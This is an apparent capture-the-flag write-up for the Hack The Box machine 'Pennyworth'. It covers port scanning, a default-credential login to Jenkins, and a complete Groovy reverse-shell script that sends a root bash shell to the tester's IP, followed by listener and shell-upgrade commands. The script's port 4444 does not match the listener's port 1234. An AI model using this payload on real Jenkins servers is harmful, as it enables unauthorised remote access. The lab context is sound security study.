HTB Pennyworth

We continue with another very easy HTB box.

$ nmap -p- 10.129.243.77 -sV --min-rate 5000

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 17:54 CEST
Nmap scan report for 10.129.243.77
Host is up (0.062s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 9.4.39.v20210325

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.40 seconds

Here we have a Jetty Jetty 9.4.39.v20210325

Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations.

https://www.eclipse.org/jetty/

If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F

This is a Jenkins server.

Leading open source automation server, Jenkins provides hundreds of plugins to support building, deploying and automating any project.

https://www.jenkins.io

Looking at http://10.129.243.77:8080/oops what version is running the target.

Trying some default Jenkins passwords and easy credentials we quickly find out that the correct credentials are: root:password.

And we get a new answer to the Jenkins Script Console’s question.

Looking around we discover a Jenkins management section and a Script Console functionality that may help us to run commands.

Resources like https://blog.pentesteracademy.com/abusing-jenkins-groovy-script-console-to-get-shell-98b951fa64a6 gives us an idea about how to get a reverse shell using Jenkins Groovy Script Console.

String host=”10.10.14.69";
int port=4444;
String cmd=”/bin/bash”;
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

$ sudo nc -lnvp 1234

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.129.243.77.
Ncat: Connection from 10.129.243.77:54554.
whoami 
root

We got a reverse shell, now we can improve a bit our tty with the usual commands.

script /dev/null -c bash 
CRTL+Z 
stty raw -echo; fg 
reset  xterm
terminal type: xterm 
export TERM=xterm 
export SHELL=bash 
stty rows 51 columns 198

And get our flag:

root@pennyworth:~# cd /root
root@pennyworth:~# ls

flag.txt  snap

root@pennyworth:~# cat flag.txt

9cdfXXXXXXXXXXXXXXXXXXXXXXXXXXXX